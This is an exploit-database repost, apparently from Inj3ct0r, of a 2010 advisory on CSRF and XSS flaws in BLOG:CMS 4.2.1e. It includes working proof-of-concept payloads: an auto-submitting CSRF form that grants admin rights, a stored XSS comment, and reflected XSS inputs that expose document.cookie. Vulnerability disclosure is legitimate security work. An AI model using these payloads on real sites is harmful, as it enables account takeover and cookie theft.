Home / os / win7

[webapps / 0day] - BLOG:CMS <= v4.2.1e Multiple Vulnerabi

Posted on 15 December 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>BLOG:CMS &lt;= v4.2.1e Multiple Vulnerabilities | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='BLOG:CMS &lt;= v4.2.1e Multiple Vulnerabilities by High-Tech Bridge . in webapps / 0day | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>============================================ BLOG:CMS &lt;= v4.2.1e Multiple Vulnerabilities ============================================ Product: BLOG:CMS Vendor: Radek Hulán ( http://blogcms.com/ ) Vulnerable Version: 4.2.1.e and probably prior versions Vendor Notification: 30 November 2010 Vulnerability Type: CSRF (Cross-Site Request Forgery) Status: Not Fixed, Vendor Alerted Risk level: Low Credit: High-Tech Bridge SA - Ethical Hacking &amp; Penetration Testing (http://www.htbridge.ch/) XSRF/CSRF: Vulnerability Details: The vulnerability exists due to failure in the &quot;admin/libs/ADMIN.php&quot; script to properly verify the source of HTTP request. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. Attacker can use browser to exploit this vulnerability. The following PoC is available: &lt;form action=&quot;http://host/admin/index.php&quot; method=&quot;post&quot; name=&quot;main&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;action&quot; value=&quot;changemembersettings&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;memberid&quot; value=&quot;USER_UD&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;name&quot; value=&quot;tester&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;realname&quot; value=&quot;tester&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;password&quot; value=&quot;&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;repeatpassword&quot; value=&quot;&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;email@example.com&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;url&quot; value=&quot;&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;admin&quot; value=&quot;1&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;canlogin&quot; value=&quot;1&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;notes&quot; value=&quot;&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;deflang&quot; value=&quot;&quot;&gt; &lt;/form&gt; &lt;script&gt; document.main.submit(); &lt;/script&gt; Stored XSS (HTB22724): Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the &quot;action.php&quot; script to properly sanitize user-supplied input in &quot;body&quot; variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. Enter comment like &lt;script&gt;alert(&#039;XSS&#039;)&lt;/script&gt; in &quot;Add new comment&quot; form. XSS (HTB22725): Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the &quot;admin/index.php&quot; script to properly sanitize user-supplied input in &quot;amount&quot; variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: &lt;form action=&quot;http://host/admin/index.php&quot; method=&quot;post&quot; name=&quot;main&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;blogid&quot; value=&quot;0&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;itemid&quot; value=&quot;0&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;action&quot; value=&quot;browseowncomments&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;amount&quot; value=&#039;10&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&#039;&gt; &lt;input type=&quot;hidden&quot; name=&quot;start&quot; value=&quot;0&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;search&quot; value=&quot;&quot;&gt; &lt;/form&gt; &lt;script&gt; document.main.submit(); &lt;/script&gt; Solution: Upgrade to the most recent version XSS(HTB22726): Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the &quot;admin/index.php&quot; script to properly sanitize user-supplied input in &quot;action&quot; variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: http://host/admin/index.php?action=settingsedit&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; Solution: Upgrade to the most recent version # <a href='http://1337db.com/'>1337db.com</a> [2010-12-15]</pre></body></html>

 

TOP